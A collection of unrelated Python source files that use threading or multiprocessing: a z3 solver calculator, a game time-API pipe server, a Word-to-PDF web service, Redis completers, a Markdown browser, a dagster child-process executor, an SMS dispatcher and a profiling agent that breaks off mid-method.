from crestdsl import model from crestdsl import sourcehelper as SH import ast from .to_z3 import Z3Converter, get_z3_variable, get_z3_var, get_z3_value, get_minimum_dt_of_several from .z3conditionchangecalculator import Z3ConditionChangeCalculator, get_behaviour_change_dt_from_constraintset from .z3calculator import Z3Calculator from .conditiontimedchangecalculator import ConditionTimedChangeCalculator from .contextconditiontimedchangecalculator import ContextConditionTimedChangeCalculator, translate_to_context import multiprocessing import queue import threading import z3 from crestdsl.config import to_python from .epsilon import Epsilon, eps_string from types import SimpleNamespace import logging logger = logging.getLogger(__name__) # TODO: extract this function and put in a central place # also do this in other files def log_if_level(level, message): """Logs the message if the level is below the specified level""" if logger.getEffectiveLevel() <= level: logger.log(level, message) class FastConditionTimedChangeCalculator(ContextConditionTimedChangeCalculator): """ THIS CLASS IS NEITHER FAST, NOR USEFUL. DELETE IT !!! """ def calculate_system(self, entity=None, include_subentities=True): logger.debug("FAST: Calculating for all entities") if not hasattr(self, "cache"): self.init_z3_constraints_and_vars() all_dts = [] """ setup workers with own context for each """ job_queue = queue.Queue() num_threads = 4 thread_workers = [] for i in range(num_threads): new_cache = translate_to_context(self.cache, z3.Context()) thread_worker = threading.Thread(target=self.thread_crawler, args=(job_queue,new_cache,all_dts)) thread_worker.setDaemon(True) thread_worker.start() """ Fill queue with stuff to do """ # TODO: check for transitions whether they can be done by time only for trans in model.get_all_transitions(entity): if trans._parent.current is trans.source: job_queue.put( (self.get_transition_time, trans) ) for influence in model.get_all_influences(entity): if self.contains_if_condition(influence): job_queue.put( (self.get_condition_change_enablers, influence) ) # updates = [up for up in get_updates(self.entity) if up.state == up._parent.current] for update in model.get_all_updates(entity): if update.state is update._parent.current: # only the currently active updates if self.contains_if_condition(update): job_queue.put( (self.get_condition_change_enablers, update) ) """ wait for queue to finish """ job_queue.join() for tw in thread_workers: assert not tw.isAlive() # """ do the other things """ # workers = [] # for influence in model.get_all_influences(entity): # if self.contains_if_condition(influence): # ctx_i = z3.Context() # new_cache = translate_to_context(self.cache, ctx_i) # worker = threading.Thread(target=self.get_condition_change_enablers, args=(influence, all_dts, new_cache)) # worker.start() # workers.append(worker) # worker.join() # # # # updates = [up for up in get_updates(self.entity) if up.state == up._parent.current] # for update in model.get_all_updates(entity): # if update.state is update._parent.current: # only the currently active updates # if self.contains_if_condition(update): # ctx_i = z3.Context() # new_cache = translate_to_context(self.cache, ctx_i) # worker = threading.Thread(target=self.get_condition_change_enablers, args=(update, all_dts, new_cache)) # worker.start() # workers.append(worker) # worker.join() # # # TODO: check for transitions whether they can be done by time only # for trans in model.get_all_transitions(entity): # if trans._parent.current is trans.source: # ctx_i = z3.Context() # new_cache = translate_to_context(self.cache, ctx_i) # worker = threading.Thread(target=self.get_transition_time, args=(trans, all_dts, new_cache)) # worker.start() # workers.append(worker) # worker.join() # print(f"Working on {len(workers)} threads") # for worker in workers: # worker.join() """ Return all behaviour change times """ return all_dts def thread_crawler(self, job_queue, cache, all_dts): """ worker thread that one by one executes an SMT task in its context """ while True: (method, modif) = job_queue.get() method(modif, all_dts, cache) job_queue.task_done() return True
Time_API.py
''' Python side of the time api. This provides actual realtime timer support, which will work within a single frame (which is otherwise not possible with X4's internal timer). ''' from X4_Python_Pipe_Server import Pipe_Server, Pipe_Client import time import threading # Name of the pipe to use. pipe_name = 'x4_time' # Flag to do a test run with the pipe client handled in python instead # of x4. test_python_client = 0 def main(args): ''' Entry function for this server. Protocol: x4 sends some request, pipe server responds (or not) based on command. The pipe server will never send messages on its own. ''' # Enable test mode if requested. if args['test']: global test_python_client test_python_client = True # Set up the pipe and connect to x4. pipe = Pipe_Server(pipe_name) # For python testing, kick off a client thread. if test_python_client: # Set up the reader in another thread. reader_thread = threading.Thread(target = Pipe_Client_Test) reader_thread.start() # Wait for client. pipe.Connect() # Var to hold the last tic time. last_tic = 0 while 1: # Blocking wait for a message from x4. message = pipe.Read() if test_python_client: print(pipe_name + ' server got: ' + message) # React based on command. if message == 'ping': # Ignore any setup pings. pass elif message == 'get': # Return current time. pipe.Write(time.perf_counter()) elif message == 'tic': # Record current time in prep for toc. last_tic = time.perf_counter() elif message == 'toc': # Return time since the tic. pipe.Write(time.perf_counter() - last_tic) else: print('Error:' + pipe_name + ' unrecognized command: ' + message) # TODO: maybe use time.sleep(?) for a bit if ever switching to # non-blocking reads. return def Pipe_Client_Test(): ''' Function to mimic the x4 client. ''' pipe = Pipe_Client(pipe_name) # Run a number of tests, to see how time values progress. for _ in range(5): # Send commands. for command in ['ping', 'get', 'tic', 'toc']: pipe.Write(command) # Capture and print responses. for _ in range(2): response = pipe.Read() print(pipe_name + ' client got: ' + response) return
office_service.py
# (c) 2014 - Felipe Astroza Araya # Under BSD License import os import win32com.client as win32 import pythoncom import md5 import time import threading from bottle import route, run, request, static_file, Bottle, HTTPError app = Bottle() UPLOAD_PATH = os.getcwd()+'\\uploads' PDF_PATH = os.getcwd()+'\\pdfs' gc_list = [] GC_SLEEP_TIME = 60*5 class GCFile: def __init__(self, path): self.file_path = path self.creation_time = time.time() gc_list.append(self) def is_waste(self): if time.time() - self.creation_time >= GC_SLEEP_TIME: return True return False def gc_thread(): while(True): for f in gc_list: if f.is_waste(): print "\nGC: Removing " + f.file_path + "\n" os.remove(f.file_path) gc_list.remove(f) time.sleep(GC_SLEEP_TIME) class WorkQueueThread(threading.Thread): def __init__(self): self.queue_sem = threading.Semaphore(0) self.queue = [] threading.Thread.__init__(self) def append(self, item): self.queue.append(item) self.queue_sem.release() def doc_to_pdf(self, item): doc = self.wapp.Documents.Open(item.word_file_path) pdf_path = PDF_PATH+'\\'+item.word_filename+'.pdf' doc.SaveAs(pdf_path, FileFormat=17) doc.Close(False) GCFile(pdf_path) def cleanup_doc(self, item): doc = self.wapp.Documents.Open(item.word_file_path) doc.RemoveDocumentInformation(4) doc.Save() doc.Close(False) def run(self): pythoncom.CoInitialize() self.wapp = None services = [self.doc_to_pdf, self.cleanup_doc] while(True): if self.queue_sem.acquire(False) == False: if self.wapp != None: self.wapp.Application.Quit() print "\nWorkQueueThread: Word Application was closed\n" self.queue_sem.acquire() # Espera por un trabajo self.wapp = win32.Dispatch('Word.Application') self.wapp.Visible = False self.wapp.DisplayAlerts = False print "\nWorkQueueThread: Work Application just started\n" item = self.queue.pop(0) print "\nWorkQueueThread: Processing %s service_type=%d\n" % (item.word_file_path, item.service_type) if item.service_type < len(services): services[item.service_type](item) else: print "\nWorkQueueThread: Invalid service_type(=%d)\n" % (item.service_type) item.lock.release() class WorkQueueItem: def __init__(self, path, word_filename, orig_filename, filename_ext, service_type): self.word_file_path = path self.orig_filename = orig_filename self.filename_ext = filename_ext self.word_filename = word_filename self.service_type = service_type self.lock = threading.Semaphore(0) worker_thread.append(self) def wait_work(self): self.lock.acquire() def save_word_file(): upload = request.files.get('upload') name, ext = os.path.splitext(upload.filename) if ext not in ('.doc','.docx'): raise HTTPError(404, "Solo archivos MS Word son permitidos: " + ext) name_hash = md5.md5(name+str(time.time())).hexdigest() save_file = open(UPLOAD_PATH+'\\'+name_hash+ext, "wb") save_file.write(upload.file.read()) save_file.close() return name, ext, name_hash+ext @app.route('/to/pdf', method='POST') def convert_to_pdf(): orig_word_filename, ext, word_filename = save_word_file() word_file_path = UPLOAD_PATH+'\\'+word_filename item = WorkQueueItem(word_file_path, word_filename, orig_word_filename, ext, 0) item.wait_work() # Espera por la conversion os.remove(word_file_path) return static_file(word_filename+'.pdf', root=PDF_PATH, download=orig_word_filename+'.pdf') @app.route('/cleanup/word', method='POST') def cleanup_word(): orig_word_filename, ext, word_filename = save_word_file() word_file_path = UPLOAD_PATH+'\\'+word_filename item = WorkQueueItem(word_file_path, word_filename, orig_word_filename, ext, 1) item.wait_work() # Espera por la limpieza GCFile(word_file_path) return static_file(word_filename, root=UPLOAD_PATH, download=orig_word_filename+ext) def main(): worker_thread = WorkQueueThread() gc=threading.Thread(target=gc_thread) gc.start() worker_thread.start() run(app, server='paste', host='0.0.0.0', port=8080) if __name__ == "__main__": main()
completers.py
import time import threading import logging from typing import Iterable from prompt_toolkit.contrib.regular_languages.completion import GrammarCompleter from prompt_toolkit.contrib.regular_languages.compiler import compile from prompt_toolkit.completion import WordCompleter, FuzzyWordCompleter from prompt_toolkit.document import Document from prompt_toolkit.completion import Completion, CompleteEvent from .config import config, COMPILING_DONE, COMPILING_JUST_FINISH from .redis_grammar import REDIS_COMMANDS, CONST from .lexer import get_lexer from .commands_csv_loader import group2commands, commands_summary, all_commands logger = logging.getLogger(__name__) class LatestUsedFirstWordCompleter(FuzzyWordCompleter): """ Not thread safe. """ def __init__(self, max_words, words, *args, **kwargs): self.words = words self.max_words = max_words super().__init__(words, *args, **kwargs) def touch(self, word): """ Make sure word is in the first place of the completer list. """ if word in self.words: self.words.remove(word) else: # not in words if len(self.words) == self.max_words: # full self.words.pop() self.words.insert(0, word) def touch_words(self, words): for word in words: self.touch(word) class FakeDocument: pass class RedisGrammarCompleter(GrammarCompleter): """ This disable Completer on blank characters, blank char will cause performance issues. """ def get_completions( self, document: Document, complete_event: CompleteEvent ) -> Iterable[Completion]: origin_text = document.text_before_cursor stripped = FakeDocument() stripped.text_before_cursor = origin_text.lstrip() # Do not complete on spaces, too slow if not origin_text.strip(): return [] return super().get_completions(stripped, complete_event) def get_completer(group2commands, redis_grammar): completer_mapping = {} # patch command completer with hint command_hint = {key: info["summary"] for key, info in commands_summary.items()} for command_group, commands in group2commands.items(): words = commands + [command.lower() for command in commands] if config.newbie_mode: hint = {command: command_hint.get(command.upper()) for command in words} else: hint = None completer_mapping[command_group] = WordCompleter( words, sentence=True, meta_dict=hint ) key_completer = LatestUsedFirstWordCompleter(config.completer_max, []) member_completer = LatestUsedFirstWordCompleter(config.completer_max, []) field_completer = LatestUsedFirstWordCompleter(config.completer_max, []) completer_mapping.update( { key: WordCompleter(tokens.split(" "), ignore_case=True) for key, tokens in CONST.items() } ) completer_mapping.update( { # all key related completers share the same completer "keys": key_completer, "key": key_completer, "destination": key_completer, "newkey": key_completer, # member "member": member_completer, "members": member_completer, # hash fields "field": field_completer, "fields": field_completer, } ) completer_mapping["commandname"] = WordCompleter(all_commands, ignore_case=True) completer = RedisGrammarCompleter(redis_grammar, completer_mapping) return completer def compile_grammar_bg(session): """ compile redis grammar in a thread, and patch session's lexer and completer. """ def compile_and_patch(session): start_time = time.time() logger.debug("[compile] start compile grammer...") redis_grammar = compile(REDIS_COMMANDS) end_time = time.time() logger.debug(f"[compile] Compile finished! Cost: {end_time - start_time}") # get lexer lexer = get_lexer(group2commands.keys(), redis_grammar) # get completer completer = get_completer(group2commands, redis_grammar) session.completer = completer session.lexer = lexer logger.debug("[compile] Patch finished!") config.compiling = COMPILING_JUST_FINISH time.sleep(1) config.compiling = COMPILING_DONE compiling_thread = threading.Thread(target=compile_and_patch, args=(session,)) compiling_thread.start()
md_browser.py
#!/usr/bin/env python # Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Simple Markdown browser for a Git checkout.""" from __future__ import print_function import SimpleHTTPServer import SocketServer import argparse import codecs import os import re import socket import sys import threading import time import webbrowser from xml.etree import ElementTree THIS_DIR = os.path.realpath(os.path.dirname(__file__)) SRC_DIR = os.path.dirname(os.path.dirname(THIS_DIR)) sys.path.insert(0, os.path.join(SRC_DIR, 'third_party', 'Python-Markdown')) import markdown def main(argv): parser = argparse.ArgumentParser(prog='md_browser') parser.add_argument('-p', '--port', type=int, default=8080, help='port to run on (default = %(default)s)') parser.add_argument('-d', '--directory', type=str, default=SRC_DIR) parser.add_argument('file', nargs='?', help='open file in browser') args = parser.parse_args(argv) top_level = os.path.realpath(args.directory) s = Server(args.port, top_level) print('Listening on http://localhost:%s/' % args.port) thread = None if args.file: path = os.path.realpath(args.file) if not path.startswith(top_level): print('%s is not under %s' % (args.file, args.directory)) return 1 rpath = os.path.relpath(path, top_level) url = 'http://localhost:%d/%s' % (args.port, rpath) print('Opening %s' % url) thread = threading.Thread(target=_open_url, args=(url,)) thread.start() elif os.path.isfile(os.path.join(top_level, 'docs', 'README.md')): print(' Try loading http://localhost:%d/docs/README.md' % args.port) elif os.path.isfile(os.path.join(args.directory, 'README.md')): print(' Try loading http://localhost:%d/README.md' % args.port) retcode = 1 try: s.serve_forever() except KeyboardInterrupt: retcode = 130 except Exception as e: print('Exception raised: %s' % str(e)) s.shutdown() if thread: thread.join() return retcode def _open_url(url): time.sleep(1) webbrowser.open(url) def _gitiles_slugify(value, _separator): """Convert a string (representing a section title) to URL anchor name. This function is passed to "toc" extension as an extension option, so we can emulate the way how Gitiles converts header titles to URL anchors. Gitiles' official documentation about the conversion is at: https://gerrit.googlesource.com/gitiles/+/master/Documentation/markdown.md#Named-anchors Args: value: The name of a section that is to be converted. _separator: Unused. This is actually a configurable string that is used as a replacement character for spaces in the title, typically set to '-'. Since we emulate Gitiles' way of slugification here, it makes little sense to have the separator charactor configurable. """ # TODO(yutak): Implement accent removal. This does not seem easy without # some library. For now we just make accented characters turn into # underscores, just like other non-ASCII characters. value = value.encode('ascii', 'replace') # Non-ASCII turns into '?'. value = re.sub(r'[^- a-zA-Z0-9]', '_', value) # Non-alphanumerics to '_'. value = value.replace(u' ', u'-') value = re.sub(r'([-_])[-_]+', r'\1', value) # Fold hyphens and underscores. return value class Server(SocketServer.TCPServer): def __init__(self, port, top_level): SocketServer.TCPServer.__init__(self, ('0.0.0.0', port), Handler) self.port = port self.top_level = top_level self.retcode = None def server_bind(self): self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.bind(self.server_address) class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): path = self.path # strip off the repo and branch info, if present, for compatibility # with gitiles. if path.startswith('/chromium/src/+/master'): path = path[len('/chromium/src/+/master'):] full_path = os.path.realpath(os.path.join(self.server.top_level, path[1:])) if not full_path.startswith(self.server.top_level): self._DoUnknown() elif path == '/doc.css': self._DoCSS('doc.css') elif not os.path.exists(full_path): self._DoNotFound() elif path.lower().endswith('.md'): self._DoMD(path) elif os.path.exists(full_path + '/README.md'): self._DoMD(path + '/README.md') else: self._DoUnknown() def _DoMD(self, path): extensions = [ 'markdown.extensions.def_list', 'markdown.extensions.fenced_code', 'markdown.extensions.tables', 'markdown.extensions.toc', 'gitiles_ext_blocks', ] extension_configs = { 'markdown.extensions.toc': { 'slugify': _gitiles_slugify }, } contents = self._Read(path[1:]) md = markdown.Markdown(extensions=extensions, extension_configs=extension_configs, output_format='html4') has_a_single_h1 = (len([line for line in contents.splitlines() if (line.startswith('#') and not line.startswith('##'))]) == 1) md.treeprocessors['adjust_toc'] = _AdjustTOC(has_a_single_h1) md_fragment = md.convert(contents).encode('utf-8') try: self._WriteHeader('text/html') self._WriteTemplate('header.html') self.wfile.write(md_fragment) self._WriteTemplate('footer.html') except: raise def _DoCSS(self, template): self._WriteHeader('text/css') self._WriteTemplate(template) def _DoNotFound(self): self._WriteHeader('text/html', status_code=404) self.wfile.write('<html><body>%s not found</body></html>' % self.path) def _DoUnknown(self): self._WriteHeader('text/html') self.wfile.write('<html><body>I do not know how to serve %s.</body>' '</html>' % self.path) def _Read(self, relpath, relative_to=None): if relative_to is None: relative_to = self.server.top_level assert not relpath.startswith(os.sep) path = os.path.join(relative_to, relpath) with codecs.open(path, encoding='utf-8') as fp: return fp.read() def _WriteHeader(self, content_type='text/plain', status_code=200): self.send_response(status_code) self.send_header('Content-Type', content_type) self.end_headers() def _WriteTemplate(self, template): contents = self._Read(os.path.join('tools', 'md_browser', template), relative_to=SRC_DIR) self.wfile.write(contents.encode('utf-8')) class _AdjustTOC(markdown.treeprocessors.Treeprocessor): def __init__(self, has_a_single_h1): super(_AdjustTOC, self).__init__() self.has_a_single_h1 = has_a_single_h1 def run(self, tree): # Given # # # H1 # # [TOC] # # ## first H2 # # ## second H2 # # the markdown.extensions.toc extension generates: # # <div class='toc'> # <ul><li><a>H1</a> # <ul><li>first H2 # <li>second H2</li></ul></li><ul></div> # # for [TOC]. But, we want the TOC to have its own subheading, so # we rewrite <div class='toc'><ul>...</ul></div> to: # # <div class='toc'> # <h2>Contents</h2> # <div class='toc-aux'> # <ul>...</ul></div></div> # # In addition, if the document only has a single H1, it is usually the # title, and we don't want the title to be in the TOC. So, we remove it # and shift all of the title's children up a level, leaving: # # <div class='toc'> # <h2>Contents</h2> # <div class='toc-aux'> # <ul><li>first H2 # <li>second H2</li></ul></div></div> for toc_node in tree.findall(".//*[@class='toc']"): toc_ul = toc_node[0] if self.has_a_single_h1: toc_ul_li = toc_ul[0] ul_with_the_desired_toc_entries = toc_ul_li[1] else: ul_with_the_desired_toc_entries = toc_ul toc_node.remove(toc_ul) contents = ElementTree.SubElement(toc_node, 'h2') contents.text = 'Contents' contents.tail = '\n' toc_aux = ElementTree.SubElement(toc_node, 'div', {'class': 'toc-aux'}) toc_aux.text = '\n' toc_aux.append(ul_with_the_desired_toc_entries) toc_aux.tail = '\n' if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
DLThreadPool.py
# import logging import threading import time from . import DLCommon as cv class ThreadPool: def __init__(self, daemon): self._daemon = daemon self._threads = [] self._insp_thr_ = None self._app_lock = threading.Lock() def Thread(self, *args, **kwargs): with self._app_lock: thr = Thread(*args, daemon=self._daemon, **kwargs) self._threads.append(thr) if not self._insp_thr_ or self._insp_thr_.isStoped(): self._insp_thr_ = Thread(target=self.__insp__, name=cv.THREADPOOL, daemon=self._daemon) self._insp_thr_.start() return thr def setDaemon(self, daemonic): self._daemon = daemonic def __insp__(self): while True: with self._app_lock: for i in list(self._threads): if i._started.is_set() and not i.isAlive(): self._threads.remove(i) if not self._threads: break time.sleep(0.1) def isAllDead(self): if len(self._threads) == 0: return True elif len(self._threads) == 1: if self._threads[0] is threading.currentThread(): return True else: return False else: return False def getPoolThreads(self): return self._threads def get(self, name): for i in self._threads: if i.getName() == name: return i def getAll(self, name): threads = [] for i in list(self._threads): if i.getName() == name: threads.append(i) return threads class Thread(threading.Thread): def __init__(self, *args, **kwargs): threading.Thread.__init__(self, *args, **kwargs) def isStarted(self): return self._started.is_set() def isRunning(self): return self._started.is_set() and self.isAlive() def isStoped(self): self.is_alive() # easy way to get ._is_stopped set when appropriate return self._is_stopped def isInitial(self): return not self.isStarted() and not self.isStoped()
child_process_executor.py
'''Facilities for running arbitrary commands in child processes.''' import os import queue import sys from abc import ABCMeta, abstractmethod from collections import namedtuple import six from dagster import check from dagster.seven import multiprocessing from dagster.utils.error import serializable_error_info_from_exc_info class ChildProcessEvent(object): pass class ChildProcessStartEvent(namedtuple('ChildProcessStartEvent', 'pid'), ChildProcessEvent): pass class ChildProcessDoneEvent(namedtuple('ChildProcessDoneEvent', 'pid'), ChildProcessEvent): pass class ChildProcessSystemErrorEvent( namedtuple('ChildProcessSystemErrorEvent', 'pid error_info'), ChildProcessEvent ): pass class ChildProcessCommand(six.with_metaclass(ABCMeta)): # pylint: disable=no-init '''Inherit from this class in order to use this library. The object must be picklable; instantiate it and pass it to _execute_command_in_child_process.''' @abstractmethod def execute(self): ''' This method is invoked in the child process. Yields a sequence of events to be handled by _execute_command_in_child_process.''' class ChildProcessCrashException(Exception): '''Thrown when the child process crashes.''' def __init__(self, exit_code=None): self.exit_code = exit_code def _execute_command_in_child_process(event_queue, command): '''Wraps the execution of a ChildProcessCommand. Handles errors and communicates across a queue with the parent process.''' check.inst_param(command, 'command', ChildProcessCommand) pid = os.getpid() event_queue.put(ChildProcessStartEvent(pid=pid)) try: for step_event in command.execute(): event_queue.put(step_event) event_queue.put(ChildProcessDoneEvent(pid=pid)) except (Exception, KeyboardInterrupt): # pylint: disable=broad-except event_queue.put( ChildProcessSystemErrorEvent( pid=pid, error_info=serializable_error_info_from_exc_info(sys.exc_info()) ) ) finally: event_queue.close() TICK = 20.0 * 1.0 / 1000.0 '''The minimum interval at which to check for child process liveness -- default 20ms.''' PROCESS_DEAD_AND_QUEUE_EMPTY = 'PROCESS_DEAD_AND_QUEUE_EMPTY' '''Sentinel value.''' def _poll_for_event(process, event_queue): try: return event_queue.get(block=True, timeout=TICK) except KeyboardInterrupt as e: return e except queue.Empty: if not process.is_alive(): # There is a possibility that after the last queue.get the # process created another event and then died. In that case # we want to continue draining the queue. try: return event_queue.get(block=False) except queue.Empty: # If the queue empty we know that there are no more events # and that the process has died. return PROCESS_DEAD_AND_QUEUE_EMPTY return None def execute_child_process_command(command): '''Execute a ChildProcessCommand in a new process. This function starts a new process whose execution target is a ChildProcessCommand wrapped by _execute_command_in_child_process; polls the queue for events yielded by the child process until the process dies and the queue is empty. This function yields a complex set of objects to enable having multiple child process executions in flight: * None - nothing has happened, yielded to enable cooperative multitasking other iterators * ChildProcessEvent - Family of objects that communicates state changes in the child process * KeyboardInterrupt - Yielded in the case that an interrupt was recieved while polling the child process. Yielded instead of raised to allow forwarding of the interrupt to the child and completion of the iterator for this child and any others that may be executing * The actual values yielded by the child process command Args: command (ChildProcessCommand): The command to execute in the child process. Warning: if the child process is in an infinite loop, this will also infinitely loop. ''' check.inst_param(command, 'command', ChildProcessCommand) event_queue = multiprocessing.Queue() process = multiprocessing.Process( target=_execute_command_in_child_process, args=(event_queue, command) ) process.start() completed_properly = False while not completed_properly: event = _poll_for_event(process, event_queue) if event == PROCESS_DEAD_AND_QUEUE_EMPTY: break yield event if isinstance(event, (ChildProcessDoneEvent, ChildProcessSystemErrorEvent)): completed_properly = True if not completed_properly: # TODO Figure out what to do about stderr/stdout raise ChildProcessCrashException(exit_code=process.exitcode) process.join()
main.py
import json import redis import threading import logging from psycopg2.pool import ThreadedConnectionPool from core.events.oktell import OktellOrderAccepted from core.coreapi import TMAPI from .kts.channels import Channel, Channels from .config import REDIS, CHANNELS, DSN, TME_DB from orders.database import AsteriskSounds LOGGER = logging.getLogger() def enrich_data(data): with TMAPI.PG_POOL.getconn() as pgcon: with pgcon.cursor() as c: c.execute(( 'select o.driver_timecount, ' 'o.discountedsumm, o.clientid as client_id, ' 'o.driverid, o.cashless, o.state, o.phone, ' 'cr.gosnumber, cr.color as car_color, ' 'cr.mark as car_mark, coalesce(cr.model, \'\') as car_model, ' 'cr.id as car_id, o.source_time ' 'from orders o ' 'join crews cw on (cw.id=o.crewid) ' 'join cars cr on (cr.id=cw.carid) ' 'where o.id=%(order_id)s;'), {'order_id': data['order_id']}) r = c.fetchone() if r: order_data = {cn.name :r[ix] for ix, cn in enumerate(c.description)} data.update(**order_data) return data def get_distributor(phone, db): LOGGER.debug(phone) phone = phone[-10:] SELECT = 'select sc.id, d.address, c.port as channel, count(sms.*) as sim_count, dst.name, dst_sms.sms '\ 'from routes_mask roma '\ 'join regions reg on (reg.id=roma.region_id) '\ 'join operators op on (op.id=roma.operator_id) '\ 'join distributors dst on (dst.id=op.distributor_id or dst.id=0) '\ 'left join distributors dst_sms on (dst_sms.id=op.distributor_id) '\ 'join sim_cards sc on (sc.distributor_id=dst.id) '\ 'join channels c on (c.id=sc.channel_id) '\ 'join devices d on (d.id=c.device_id) '\ 'left join sms on (sms.sim_id=sc.id and sms.date_time > %s and sms.direction=1) '\ 'where (roma.aaa=%s and %s between roma.range_a and roma.range_b) and '\ 'sc.direction=2 and sc.is_active and (reg.is_home or dst.all_home) and '\ '(dst_sms.sms or (dst_sms.id = dst.id)) '\ 'group by sc.id, d.address, c.port, dst.id, dst_sms.sms '\ 'order by dst.id desc, sim_count '\ 'limit 1;' date_time = datetime.datetime.now() date_time = datetime.datetime( date_time.year, date_time.month, date_time.day, 0, 0, 0) ARGS = (date_time, phone[:3], int(phone[3:]), ) # logger.debug('get_distributor: %s %s' % (SELECT, ARGS)) c = db.cursor() c.execute(SELECT, ARGS) try: sim_id, address, channel, _, distributor, _ = c.fetchone() channel %= 5060 except Exception as e: LOGGER.warning('get_distributor exception 1: %s %s' % (e, phone)) sim_id, address, channel, _, distributor, _ = None, '', 0, 0, None, False c.close() LOGGER.debug('%s %s %s %s %s' % (phone, distributor, address, channel, sim_id)) # db.close() return sim_id, address, channel, distributor def register_channels(pg_pool): SELECT = ( 'select distinct d.address, c.port%5060 as port, dest.name ' 'from devices d ' 'join channels c on (c.device_id=d.id) ' 'join sim_cards sc on (sc.id=c.sim_id) ' 'join distributors dest on (dest.id=sc.distributor_id) ' 'where d.name like \'ะšะขะก%\' and c.is_active and sc.direction=2 ' 'order by d.address, port' ) channels = Channels(pg_pool, LOGGER) with pg_pool.getconn() as pgconn: with pgconn.cursor() as c: c.execute(SELECT) [channels.register(Channel(address=ch[0], channel=ch[1]), distributor=ch[-1]) for ch in c.fetchall()] return channels def main(): TMAPI.LOGGER = LOGGER TMAPI.ASTERISK_SOUNDS = AsteriskSounds() pg_pool = ThreadedConnectionPool(*DSN) TMAPI.PG_POOL = ThreadedConnectionPool(*TME_DB) channels = register_channels(pg_pool) redpool = redis.ConnectionPool(host=REDIS) r = redis.Redis(connection_pool=redpool) rs = r.pubsub() rs.subscribe(CHANNELS) for event in rs.listen(): LOGGER.debug('Received %s', event) if event['type'] == 'message': LOGGER.debug('Got message: %s', event) channel = event['channel'].decode().split(':')[1] data = json.loads(event['data']) data = enrich_data(data) phones = data['phones'][0] data = TMAPI.create_message(channel, data) _channel = threading.Thread( target=channels.send_sms, args=(data['sms'], phones)) _channel.start() LOGGER.debug('%s: %s', _channel, event) if __name__ == '__main__': try: m = threading.Thread(target=main) m.start() m.join() except KeyboardInterrupt as e: exit(0)
agent.py
from __future__ import division, print_function, absolute_import import time import datetime import sys import traceback import socket import threading import os import signal import atexit import platform import random import math from .runtime import min_version, runtime_info, register_signal from .utils import timestamp, generate_uuid from .config import Config from .config_loader import ConfigLoader from .message_queue import MessageQueue from .frame_cache import FrameCache from .reporters.process_reporter import ProcessReporter from .reporters.profile_reporter import ProfileReporter, ProfilerConfig from .reporters.error_reporter import ErrorReporter from .reporters.span_reporter import SpanReporter from .profilers.cpu_profiler import CPUProfiler from .profilers.allocation_profiler import AllocationProfiler from .profilers.block_profiler import BlockProfiler class Span(object): def __init__(self, stop_func = None): if stop_func: self.stop_func = stop_func else: self.stop_func = None def stop(self): if self.stop_func: self.stop_func() def __enter__(self): pass def __exit__(self, exc_type, exc_value, traceback): self.stop() class Agent(object): AGENT_VERSION = "1.2.6" SAAS_DASHBOARD_ADDRESS = "https://agent-api.stackimpact.com" def __init__(self, **kwargs): self.agent_started = False self.agent_destroyed = False self.profiler_active = False self.span_active = False self.main_thread_func = None self.run_ts = None self.run_id = None self.config = Config(self) self.config_loader = ConfigLoader(self) self.message_queue = MessageQueue(self) self.frame_cache = FrameCache(self) self.process_reporter = ProcessReporter(self) self.error_reporter = ErrorReporter(self) self.span_reporter = SpanReporter(self) config = ProfilerConfig() config.log_prefix = 'CPU profiler' config.max_profile_duration = 20 config.max_span_duration = 5 config.max_span_count = 30 config.span_interval = 20 config.report_interval = 120 self.cpu_reporter = ProfileReporter(self, CPUProfiler(self), config) config = ProfilerConfig() config.log_prefix = 'Allocation profiler' config.max_profile_duration = 20 config.max_span_duration = 5 config.max_span_count = 30 config.span_interval = 20 config.report_interval = 120 self.allocation_reporter = ProfileReporter(self, AllocationProfiler(self), config) config = ProfilerConfig() config.log_prefix = 'Block profiler' config.max_profile_duration = 20 config.max_span_duration = 5 config.max_span_count = 30 config.span_interval = 20 config.report_interval = 120 self.block_reporter = ProfileReporter(self, BlockProfiler(self), config) self.options = None def get_option(self, name, default_val=None): if name not in self.options: return default_val else: return self.options[name] def start(self, **kwargs): if not min_version(2, 7) and not min_version(3, 4): raise Exception('Supported Python versions 2.6 or higher and 3.4 or higher') if platform.python_implementation() != 'CPython': raise Exception('Supported Python interpreter is CPython') if self.agent_destroyed: self.log('Destroyed agent cannot be started') return if self.agent_started: return self.options = kwargs if 'auto_profiling' not in self.options: self.options['auto_profiling'] = True if 'dashboard_address' not in self.options: self.options['dashboard_address'] = self.SAAS_DASHBOARD_ADDRESS if 'agent_key' not in self.options: raise Exception('missing option: agent_key') if 'app_name' not in self.options: raise Exception('missing option: app_name') if 'host_name' not in self.options: self.options['host_name'] = socket.gethostname() self.run_id = generate_uuid() self.run_ts = timestamp() self.config_loader.start() self.message_queue.start() self.frame_cache.start() self.cpu_reporter.setup() self.allocation_reporter.setup() self.block_reporter.setup() self.span_reporter.setup() self.error_reporter.setup() self.process_reporter.setup() # execute main_thread_func in main thread on signal def _signal_handler(signum, frame): if(self.main_thread_func): func = self.main_thread_func self.main_thread_func = None try: func() except Exception: self.exception() return True if not runtime_info.OS_WIN: register_signal(signal.SIGUSR2, _signal_handler) if self.get_option('auto_destroy') is None or self.get_option('auto_destroy') is True: # destroy agent on exit def _exit_handler(*arg): if not self.agent_started or self.agent_destroyed: return try: self.message_queue.flush() self.destroy() except Exception: self.exception() atexit.register(_exit_handler) if not runtime_info.OS_WIN: register_signal(signal.SIGQUIT, _exit_handler, once = True) register_signal(signal.SIGINT, _exit_handler, once = True) register_signal(signal.SIGTERM, _exit_handler, once = True) register_signal(signal.SIGHUP, _exit_handler, once = True) self.agent_started = True self.log('Agent started') def enable(self): if not self.config.is_agent_enabled(): self.cpu_reporter.start() self.allocation_reporter.start() self.block_reporter.start() self.span_reporter.start() self.error_reporter.start() self.process_reporter.start() self.config.set_agent_enabled(True) def disable(self): if self.config.is_agent_enabled(): self.cpu_reporter.stop() self.allocation_reporter.stop() self.block_reporter.stop() self.span_reporter.stop() self.error_reporter.stop() self.process_reporter.stop() self.config.set_agent_enabled(False) def profile(self, name='Default'): if not self.agent_started or self.span_active: return Span(None) self.span_active = True selected_reporter = None active_reporters = [] if self.cpu_reporter.started: active_reporters.append(self.cpu_reporter) if self.allocation_reporter.started: 